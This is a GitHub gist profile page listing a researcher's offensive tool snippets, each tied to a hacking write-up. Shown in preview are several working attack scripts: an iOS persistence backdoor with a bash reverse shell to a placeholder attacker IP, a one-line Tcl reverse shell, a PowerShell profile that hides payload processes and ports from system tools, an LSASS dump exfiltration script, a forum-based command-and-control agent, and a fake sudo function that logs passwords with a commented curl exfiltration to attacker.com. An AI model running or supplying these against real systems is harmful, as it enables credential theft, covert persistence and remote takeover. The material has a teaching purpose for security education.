Skip to content

Instantly share code, notes, and snippets.

View tokyoneon's full-sized avatar
💻
tokyoneon@kali ~#

tokyoneon tokyoneon

💻
tokyoneon@kali ~#
View GitHub Profile
@tokyoneon
tokyoneon / lsass_exfil.ps1
Created November 16, 2020 17:07
exfil LSASS dump via Microsoft.PowerShell_profile.ps1
# write-up: https://www.varonis.com/blog/author/tokyoneon/
# an if statement to prevent the attack from executing without administrator privileges
if (whoami /groups | findstr /i "S-1-16-12288")
{
# start the attack as a background processs to prevent the PS terminal from stalling when opened
Start-Job {
# where to write data during the attack?
$temp = "$env:TEMP"
@tokyoneon
tokyoneon / profile.ps1
Created August 26, 2020 23:09
PowerShell profile.ps1 for evading Netstat, Tasklist, Get-EventLog, Schtasks, etc
# write-up: https://null-byte.com/powershell-evasion-0329395/
# create the profile.ps1 directory if it doesn't exist
# cd $env:USERPROFILE;$d="Documents\WindowsPowerShell\";New-Item -ItemType Directory -Name "$d";$h=Get-Item "$d";$h.Attributes="Hidden"
# processes and filenames to exclude, pipe separated. e.g., payload.exe, evil.dll, tokyoneon.ps1
$excludeFiles = "payload|evil|tokyoneon"
# listening ports and PIDs to exclude
$excludePorts = "4444|1337|31337|55555"
@tokyoneon
tokyoneon / persistence.gist
Created August 5, 2020 03:31
iOS persistent backdoor script
# writeup: https://null-byte.com/backdoor-0325535/
# create bash script executable
echo -e '#!/bin/bash\nexport PS1="backdoor> "\nbash -i >& /dev/tcp/ATTACKER-IP-ADDRESS/2222 0>&1' >/Library/Caches/persistence
# elevate file permissions
chmod +x /Library/Caches/persistence
# create launchd service
printf '<?xml version="1.0" encoding="UTF-8"?>
@tokyoneon
tokyoneon / agent.sh
Created March 18, 2020 23:25
MyCC - turn MyBB forums into C&C servers
#!/bin/bash
# https://null-byte.com/turn-forums-into-c-c-servers-0196708/
while true; do
forumUser="tokyoneon";
username="tokyoneon@email.com";
password="treHGFd76547^%$";
cookies='/tmp/forum_cookies';
function urlencode ()
@tokyoneon
tokyoneon / data exfil
Created July 1, 2019 05:25
Hacking macOS: Use Images to Smuggle Data Through Firewalls
#!/bin/bash
# Script for https://null-byte.com/smuggle-data-through-firewalls-0197128/
# `if` statement to detemine if the message is a 'response' one
# This is the command being executed and embedded in the photo.
# Single-quotes are used here to help with escaping special
# characters within the desired command(s).
exfilData='ls -lah "/Users/$USER/"'
# Where the attackers PHP server is located. This needs to be
@tokyoneon
tokyoneon / reverse_shell.tcl
Created April 20, 2019 08:10
Use One Tclsh Command to Bypass Antivirus #macOS
# https://null-byte.wonderhowto.com/how-to/hacking-macos-use-one-tclsh-command-bypass-antivirus-protections-0186330/
set s [socket 1.2.3.4 9999];while 42 { puts -nonewline $s "hacker> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;
@tokyoneon
tokyoneon / apfs_brute.sh
Created April 20, 2019 07:25
Brute Force FileVault Protected Partitions
#!/bin/bash
# https://null-byte.wonderhowto.com/how-to/hacking-macos-break-into-macbook-encrypted-with-filevault-0185177/
# checks to ensure all 3 args are present
if [[ ! $3 ]]; then
echo -e "\nusage: $ ./script.sh /dev/sdaX passwords.list -killswitch\n"
exit 0
fi
@tokyoneon
tokyoneon / sudo
Last active September 19, 2022 11:02
Sudo function for stealing Linux passwords
function sudo ()
{
# https://null-byte.com/privesc-0194190/
realsudo="$(which sudo)";
read -s -p "[sudo] password for $USER: " inputPasswd;
printf "\n";
printf '%s\n' "$USER : $inputPasswd" > /tmp/hackedPasswd.txt;
# encoded=$(printf '%s' "$inputPasswd" | base64) > /dev/null 2>&1;
# curl -s "http://attacker.com/$USER:$encoded" > /dev/null 2>&1;
$realsudo -S -u root bash -c "exit" <<< "$inputPasswd" > /dev/null 2>&1;
`/ tokyoneon ~/backdoor-apk/backdoor-apk
> ./backdoor-apk.sh 4.apk
________
/ ______ \
|| _ _ ||
||| || ||| AAAAAA PPPPPPP KKK KKK
|||_||_||| AAA AAA PPP PPP KKK KKK
|| _ _o|| (o) AAA AAA PPP PPP KKKKKK
||| || ||| AAAAAAAA PPPPPPPP KKK KKK
|||_||_||| AAA AAA PPP KKK KKK

Keybase proof

I hereby claim:

  • I am tokyoneon on github.
  • I am tokyoneon (https://keybase.io/tokyoneon) on keybase.
  • I have a public key whose fingerprint is 94BF C36E A65D 8973 30D6 6199 C432 53B8 CE95 B841

To claim this, I am signing this object: